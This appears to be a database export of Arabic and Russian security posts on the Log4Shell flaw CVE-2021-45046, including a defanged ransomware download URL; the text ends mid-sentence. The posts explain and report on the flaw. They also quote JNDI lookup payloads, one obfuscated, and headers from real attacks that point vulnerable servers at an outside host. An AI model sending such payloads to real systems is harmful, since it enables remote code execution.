Log4j 2.16 \u0644\u0645\u0639\u0627\u0644\u062c\u0629 \u0627\u0644\u062e\u0637\u0623 \u0627\u0644\u0630\u064a \u062a\u0645 \u062a\u0639\u064a\u064a\u0646\u0647 \u0643\u0640 CVE-2021-45046 \n\n\u0643\u064a\u0641 \u062a\u0639\u0645\u0644 \u062b\u063a\u0631\u0629 Log4Shell ..\u061f\n\u0628\u062f\u0627\u064a\u0629\u064b \u0645\u0627 \u0647\u0648 Log4j \u0648 JNDI ..\u061f\nLog4j\n\u0645\u0643\u062a\u0628\u0629 Java \u0628\u0645\u062b\u0627\u0628\u0629 \u0623\u062f\u0627\u0629 \u0645\u0633\u0627\u0639\u062f\u0629 \u062a\u0633\u062a\u062e\u062f\u0645 \u0639\u0644\u0649 \u0646\u0637\u0627\u0642 \u0648\u0627\u0633\u0639 \u0641\u064a \u0628\u0631\u0627\u0645\u062c Java \u0644\u062a\u0633\u062c\u064a\u0644 \u0631\u0633\u0627\u0626\u0644 \u0627\u0644\u062e\u0637\u0623 \u0641\u064a \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0648\u062a\u0633\u062a\u062e\u062f\u0645 \u0623\u064a\u0636\u0627 \u0641\u064a \u062e\u062f\u0645\u0627\u062a cloud computing\n\nJNDI\n\u0648\u0627\u062c\u0647\u0629 \u0628\u0631\u0645\u062c\u0629 \u062a\u0637\u0628\u064a\u0642\u0627\u062a Java APIs \u062a\u0633\u062a\u062e\u062f\u0645\u0647\u0627 Log4j \u0644\u0627\u0633\u062a\u0631\u062f\u0627\u062f \u0627\u0644\u0639\u0646\u0627\u0635\u0631 \u0648\u0627\u0644\u0643\u0627\u0626\u0646\u0627\u062a \u0645\u0646 \u0648\u062d\u062f\u0627\u062a \u0627\u0644\u062e\u062f\u0645\u0629 \u0627\u0644\u0628\u0639\u064a\u062f\u0629 \u0648\u064a\u0645\u0643\u0646 \u0644\u0647 \u0627\u0644\u0627\u0633\u062a\u0641\u0627\u062f\u0629 \u0645\u0646 \u0645\u0646 \u0627\u0644\u0639\u062f\u064a\u062f \u0645\u0646 \u0648\u0627\u062c\u0647\u0627\u062a \u0627\u0644\u062f\u0644\u064a\u0644 \u0628\u0645\u0627 \u0641\u064a \u0630\u0644\u0643 \u0648\u0627\u062c\u0647\u0629\u00a0\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u0627\u0644\u0648\u0635\u0648\u0644 \u0627\u0644\u062e\u0641\u064a\u0641 \u0625\u0644\u0649 \u0627\u0644\u062f\u0644\u064a\u0644\u00a0LDAP \u0648\u0646\u0638\u0627\u0645 \u0627\u0633\u0645\u0627\u0621 \u0627\u0644\u0645\u062c\u0627\u0644\u00a0(DNS) \u0648\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 (IIOP) \n\n\u0633\u0628\u0628 \u0627\u0644\u062e\u0644\u0644\n\u0639\u0646\u062f \u062a\u0634\u063a\u064a\u0644 \u0645\u064a\u0632\u0629 \u0627\u0633\u062a\u0628\u062f\u0627\u0644 \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0627\u0644\u0631\u0633\u0627\u0626\u0644\u00a0\u0633\u062a\u0643\u062a\u0634\u0641 Log4j \u0627\u0644\u0633\u0644\u0627\u0633\u0644 \u0627\u0644\u062a\u064a \u062a\u0634\u064a\u0631 \u0625\u0644\u0649 \u0645\u0648\u0627\u0631\u062f JNDI \u0641\u064a \u0645\u0635\u0627\u062f\u0631 \u0627\u0644\u062a\u0643\u0648\u064a\u0646 \u0648\u0631\u0633\u0627\u0626\u0644 \u0627\u0644\u0633\u062c\u0644 \u0648\u0627\u0644\u0645\u0639\u0627\u0645\u0644\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0645 \u062a\u0645\u0631\u064a\u0631\u0647\u0627 \u0628\u0648\u0627\u0633\u0637\u0629 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a\u060c \u0648\u0646\u0638\u0631\u0627 \u0644\u0623\u0646 Log4j \u0644\u0627 \u064a\u0642\u0648\u0645 \u0628\u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0639\u0646\u0627\u0648\u064a\u0646 url \u0627\u0644\u062a\u064a \u062a\u0645 \u0625\u0631\u0633\u0627\u0644\u0647\u0627 \u0641\u064a \u0647\u0630\u0647 \u0627\u0644\u0633\u0644\u0627\u0633\u0644 \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0646\u0634\u0627\u0621 \u0637\u0644\u0628\u0627\u062a \u0636\u0627\u0631\u0629 \u0644\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0633\u062a\u062e\u062f\u0645 Log4j \u0628\u0627\u0633\u062a\u0628\u062f\u0627\u0644 \u0627\u0644\u0631\u0633\u0627\u0626\u0644 \u0641\u064a \u0627\u0644\u062d\u0642\u0648\u0644 \u0627\u0644\u062a\u064a \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0639\u0646\u0627\u0648\u064a\u0646 url \u0628\u062e\u0648\u0627\u062f\u0645 \u0636\u0627\u0631\u0629\n\u0639\u0644\u0649 \u0633\u0628\u064a\u0644 \u0627\u0644\u0645\u062b\u0627\u0644 \u0641\u064a \u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0648\u064a\u0628 \u0646\u0638\u0631\u0627 \u0644\u0623\u0646\u0647 \u064a\u062a\u0645 \u062a\u0633\u062c\u064a\u0644 \u0637\u0644\u0628\u0627\u062a\u00a0HTTP\u00a0\u0628\u0634\u0643\u0644 \u0645\u062a\u0643\u0631\u0631 \u0641\u0625\u0646 \u0645\u062a\u062c\u0647 \u0627\u0644\u0647\u062c\u0648\u0645 \u0627\u0644\u0634\u0627\u0626\u0639 \u0647\u0648 \u0648\u0636\u0639 \u0627\u0644\u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u0636\u0627\u0631\u0629 \u0641\u064a\u00a0\u0639\u0646\u0648\u0627\u0646 url \u0644\u0637\u0644\u0628 HTTP \u0623\u0648\u00a0\u0631\u0623\u0633 HTTP\u00a0\u064a\u062a\u0645 \u062a\u0633\u062c\u064a\u0644\u0647 \u0628\u0634\u0643\u0644 \u0645\u062a\u0643\u0631\u0631\n\u0645\u062b\u0644: \n\u00a0${jndi:[protocol]://[remote server and code address]}\n\u064a\u062a\u0645 \u0639\u0631\u0636 \u0639\u0646\u0648\u0627\u0646 url \u0627\u0644\u0630\u064a \u0642\u0627\u0645 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u062a\u0639\u064a\u064a\u0646\u0647 \u0643\u0628\u064a\u0627\u0646\u0627\u062a \u0639\u0646\u0635\u0631 Java \u0648\u0628\u0639\u062f\u0647\u0627 \u064a\u062a\u0645 \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0645\u0646 \u0647\u0630\u0627 \u0627\u0644\u0639\u0646\u0648\u0627\u0646 \u0625\u0630\u0627 \u0643\u0627\u0646 \u0645\u062a\u0635\u0644\u0627 \u0628\u0627\u0644\u0625\u0646\u062a\u0631\u0646\u062a \u0648\u0628\u0625\u062f\u062e\u0627\u0644 \u0633\u0644\u0633\u0644\u0629 \u064a\u062a\u0645 \u062a\u0633\u062c\u064a\u0644\u0647\u0627 \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u062a\u062d\u0645\u064a\u0644 \u0648\u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0636\u0627\u0631\u0629 \u0645\u0633\u062a\u0636\u0627\u0641\u0629 \u0639\u0644\u0649 \u0639\u0646\u0648\u0627\u0646 url \u0639\u0627\u0645 \u064a\u062a\u0645 \u062a\u0646\u0641\u064a\u0630\u0647\u0627 \u062a\u0644\u0642\u0627\u0626\u064a\u0627 \u0641\u064a \u0627\u0644\u0630\u0627\u0643\u0631\u0629\n\u064a\u0648\u062c\u062f \u0645\u062c\u0645\u0648\u0639\u0629 \u0645\u062a\u0646\u0648\u0639\u0629 \u0645\u0646 \u0623\u0634\u0643\u0627\u0644 \u0627\u0644\u062a\u0639\u062a\u064a\u0645 \u062a\u064f\u0633\u062a\u062e\u062f\u0645 \u0644\u0645\u0646\u0639 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u0641\u062d\u0635 \u0623\u0648 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0645\u062b\u0644:\n($ {$ {:: - j} $ {:: - n} $ {:: - d} $ {:: - I})\u00a0\n\u0628\u0639\u0636 \u0631\u0624\u0648\u0633 HTTP \u0627\u0644\u062a\u064a \u0644\u0627\u062d\u0638\u0647\u0627 \u0627\u0644\u0628\u0627\u062d\u062b\u0648\u0646 \u0641\u064a \u0637\u0644\u0628 GET\u00a0\nreferer=${jndi:ldap://[redacted].interact.sh}\nx-http-host-override=${jndi:ldap://[redacted].interact.sh}\ntrue-client-ip=${jndi:ldap://[redacted].interact.sh}\nx-forwarded-port=443, x-client-ip=${jndi:ldap://[redacted].interact.sh}\ncf-connecting_ip=${jndi:ldap://[redacted].interact.sh}\nx-forwarded-host=${jndi:ldap://[redacted].interact.sh}\ncontact=${jndi:ldap://[redacted].interact.sh} \n\n\u0644\u0627\u062d\u0638 \u0627\u0644\u0628\u0627\u062d\u062b\u0648\u0646 \u0623\u064a\u0636\u0627 \u062a\u062d\u0648\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0625\u0644\u0649 \u0648\u0627\u062c\u0647\u0629 \u0628\u0631\u0645\u062c\u0629 \u062a\u0637\u0628\u064a\u0642\u0627\u062a RMI \u0628\u062f\u0644\u0627 \u0645\u0646 \u0648\u0627\u062c\u0647\u0629 \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 LDAP \n\nLog4j 2.16.0 _ CVE-2021-45046 \nhttps://logging.apache.org/log4j/2.x/security.html\n\n\u0644\u0641\u062d\u0635 \u062b\u063a\u0631\u0627\u062a Log4Shell \u0648\u0625\u0635\u0644\u0627\u062d\u0647\u0627 \u0628\u0645\u0627 \u0641\u064a \u0630\u0644\u0643 log4j 2.15.0 \u0627\u0644\u0645\u0635\u0646\u0641\u0629 CVE-2021-45046\nhttps://github.com/logpresso/CVE-2021-44228-Scanner\n\nFind vulnerable Log4j2 versions on disk and also inside Java Archive Files\nhttps://github.com/fox-it/log4j-finder", "creation_timestamp": "2021-12-17T00:07:48.000000Z"}, {"uuid": "4c9b51e5-c138-43e1-a109-cdb36ae9f21e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/true_secator/2677", "content": "NHS Digital \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043e\u0431 RCE \u0432 Windows-\u043a\u043b\u0438\u0435\u043d\u0442\u0435 \u0434\u043b\u044f \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439 Okta Advanced Server Access.\n\n\u0420\u0435\u0448\u0435\u043d\u0438\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u0435\u0442 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439 \u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c Zero Trust \u0434\u043b\u044f \u043e\u0431\u043b\u0430\u0447\u043d\u043e\u0439 \u0438 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b, \u0435\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0442\u044b\u0441\u044f\u0447\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 CVE-2022-24295 \u0438 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u0430 \u0432\u0441\u0435\u043c \u0432\u0435\u0440\u0441\u0438\u044f\u043c \u041f\u041e \u0434\u043e 1.57.0 \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e. \u0423\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a, \u043d\u0435 \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0438\u0439 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u043f\u043e\u0434\u043b\u0438\u043d\u043d\u043e\u0441\u0442\u0438, \u043c\u043e\u0436\u0435\u0442 \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0432 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0439 URL-\u0430\u0434\u0440\u0435\u0441.\n\n\u0423\u0441\u043f\u0435\u0448\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u043f\u043e\u043b\u043d\u043e\u043c\u0443 \u0437\u0430\u0445\u0432\u0430\u0442\u0443 \u0441\u0438\u0441\u0442\u0435\u043c\u044b. \u041f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a \u043f\u043e\u043a\u0430 \u043d\u0435 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u043b \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0435\u0439 \u043e\u0448\u0438\u0431\u043a\u0438, \u043f\u044b\u0442\u0430\u044f\u0441\u044c \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u0435\u0435 \u0437\u043b\u043e\u043d\u0430\u043c\u0435\u0440\u0435\u043d\u043d\u043e\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n\nNHS Digital \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u043f\u043e\u0441\u043a\u043e\u0440\u0435\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u043e\u0442\u043c\u0435\u0447\u0430\u0435\u0442 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u043e\u0431\u0445\u043e\u0434\u043d\u044b\u0445 \u043f\u0443\u0442\u0435\u0439 \u0434\u043b\u044f \u0432\u043d\u043e\u0432\u044c \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0432\u043d\u043e\u0432\u044c \u0432\u044b\u0448\u0435\u0434\u0448\u0438\u0439 \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u044c NHS Digital \u0442\u0430\u043a\u0436\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439\u00a0Log4Shell (CVE-2021-45105, CVE-2021-45046 \u0438 CVE-2021-44228) \u0432 Okta.", "creation_timestamp": "2022-02-28T15:06:00.000000Z"}, {"uuid": "f8e32fc2-8da5-4b58-827d-1078d9aee0c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/true_secator/2446", "content": "\u041f\u043e\u0434\u0442\u044f\u043d\u0443\u043b\u0430\u0441\u044c \u0442\u044f\u0436\u0435\u043b\u0430\u044f \u0430\u0440\u0442\u0438\u043b\u043b\u0435\u0440\u0438\u044f: \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0438\u0439 Jam, \u043a\u0430\u043a \u043c\u044b \u0438 \u043f\u0440\u043e\u0433\u043d\u043e\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0438, \u0435\u0449\u0435 \u0432\u043f\u0435\u0440\u0435\u0434\u0438.\n \n\u0412\u0441\u0435 \u044d\u0442\u043e \u0434\u0430\u0436\u0435 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a CVE-2021-44228 \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0435\u0449\u0435 6 \u0434\u0435\u043a\u0430\u0431\u0440\u044f \u0441 \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u043c Log4j 2.15.0, \u0430 \u0432\u044b\u0437\u0432\u0430\u043d\u043d\u0430\u044f \u044d\u0442\u0438\u043c \u043f\u0430\u0442\u0447\u0435\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0430\u044f CVE-2021-45046 (\u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0432\u0448\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c log4shell  \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f\u0445 \u0441 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c\u044e \u0430\u0442\u0430\u043a \u0441 \u043e\u0442\u043a\u0430\u0437\u043e\u043c \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438) \u0442\u0430\u043a\u0436\u0435 \u0431\u044b\u043b\u0430 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u043c \u0441\u0430\u043c\u043e\u0439 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 Log4j 2.12.2 \u0438 2.16.0, \u0443\u0434\u0430\u043b\u044f\u044e\u0449\u0435\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u044e \u043f\u043e\u0438\u0441\u043a\u0430 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439 \u0438 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u044e\u0449\u0435\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a JNDI.\n \n\u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u0431\u043e\u043b\u0435\u0435 70 \u043e\u0431\u0440\u0430\u0437\u0446\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e, \u0447\u0442\u043e \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u043f\u043e \u0441\u0440\u0430\u0432\u043d\u0435\u043d\u0438\u044e \u0441 \u0442\u0435\u043c, \u0447\u0442\u043e, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0443\u0436\u0435 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n \n\u041d\u043e \u0447\u0442\u043e \u0435\u0449\u0435 \u0445\u0443\u0436\u0435, Bitdefender \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u0437\u0430 Log4Shell \u0432\u0437\u044f\u043b\u0438\u0441\u044c \u043f\u0435\u0440\u0432\u044b\u0435 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0438. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u044b\u0442\u0430\u044e\u0442\u0441\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043e\u0448\u0438\u0431\u043a\u0443 \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0434\u0432\u043e\u0438\u0447\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 .NET \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0448\u0438\u0444\u0440\u0443\u0435\u0442 \u0444\u0430\u0439\u043b\u044b \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 c \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435\u043c khonsari. \u0417\u0430\u043f\u0438\u0441\u043a\u0430 \u0441 \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0432\u044b\u043a\u0443\u043f\u0430 \u00ab\u041a\u0410\u041a \u041f\u041e\u041b\u0423\u0427\u0418\u0422\u042c \u0421\u0412\u041e\u0418 \u0424\u0410\u0419\u041b\u042b BACK.TXT\u00bb \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u0430 \u0440\u0430\u0431\u043e\u0447\u0438\u0439 \u0441\u0442\u043e\u043b.\n \n\u041f\u0435\u0440\u0432\u044b\u0439 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442 \u0431\u044b\u043b \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d 11 \u0434\u0435\u043a\u0430\u0431\u0440\u044f, \u043a\u043e\u0433\u0434\u0430 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u0445\u043e\u0441\u0442 \u0431\u044b\u043b \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u0432\u043e\u0438\u0447\u043d\u044b\u0439 \u0444\u0430\u0439\u043b \u0441 hxxp://3.145.115.94/zambo/groenhuyzen.exe. \u042d\u0442\u043e \u043d\u043e\u0432\u043e\u0435 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0438\u0445 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u0431\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u0441\u0432\u043e\u0435\u043c\u0443 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044e \u0432 \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u0430\u0445. \u0412 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0441\u0432\u043e\u0435 \u041f\u041e \u0445\u0430\u043a\u0435\u0440\u044b \u043d\u0430\u0440\u0435\u043a\u043b\u0438 \u0438\u043c\u0435\u043d\u0435\u043c \u0432\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u0430 \u0430\u043d\u0442\u0438\u043a\u0432\u0430\u0440\u043d\u043e\u0433\u043e \u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0430 \u0432 \u041b\u0443\u0438\u0437\u0438\u0430\u043d\u0435. \u041f\u043e\u0447\u0435\u043c\u0443 \u2013 \u043d\u0435 \u044f\u0441\u043d\u043e.\n \n\u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 Khonsari \u0441\u043a\u0430\u043d\u0438\u0442 \u0432\u0441\u0435 \u0434\u0438\u0441\u043a\u0438 \u0438 \u0448\u0438\u0444\u0440\u0443\u0435\u0442 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u043f\u0430\u043f\u043a\u0438 \u0441 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438, \u0432\u0438\u0434\u0435\u043e, \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f\u043c\u0438, \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430\u043c\u0438 \u0438 \u0440\u0430\u0431\u043e\u0447\u0438\u0439 \u0441\u0442\u043e\u043b. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u0435 \u0448\u0438\u0444\u0440\u0443\u044e\u0442\u0441\u044f \u0444\u0430\u0439\u043b\u044b \u0441 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f\u043c\u0438 .ini \u0438 .lnk. \u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 AES 128 CBC \u0441 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u043e\u0439 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c\u0430 PaddingMode.Zeros \u0434\u043b\u044f \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438 BitDefender \u0432 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u0445\u0430\u043a\u0435\u0440\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0442\u043e\u0442 \u0436\u0435 \u0441\u0435\u0440\u0432\u0435\u0440 \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f RAT Orcus.\n \n\u041d\u0435 \u043e\u0431\u043e\u0448\u043b\u043e\u0441\u044c \u0438 \u0431\u0435\u0437 \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u0438\u0445 \u0438 \u0438\u0440\u0430\u043d\u0441\u043a\u0438\u0445 \u0410\u0420\u0422, \u0441\u043b\u0435\u0434\u044b \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432\u044b\u044f\u0432\u0438\u043b\u0438 \u0441\u043f\u0435\u0446\u044b \u0438\u0437 Mandiant. \u0412\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0441\u044c \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0435\u0439 \u0432\u0441\u0435\u043e\u0431\u0449\u0435\u0433\u043e \u0445\u0430\u043e\u0441\u0430, \u0410\u0420\u0422 \u0437\u0430\u043d\u0438\u043c\u0430\u043b\u0438\u0441\u044c \u0440\u0435\u0448\u0435\u043d\u0438\u0435\u043c \u0442\u0440\u0430\u0434\u0438\u0446\u0438\u043e\u043d\u043d\u044b\u0445 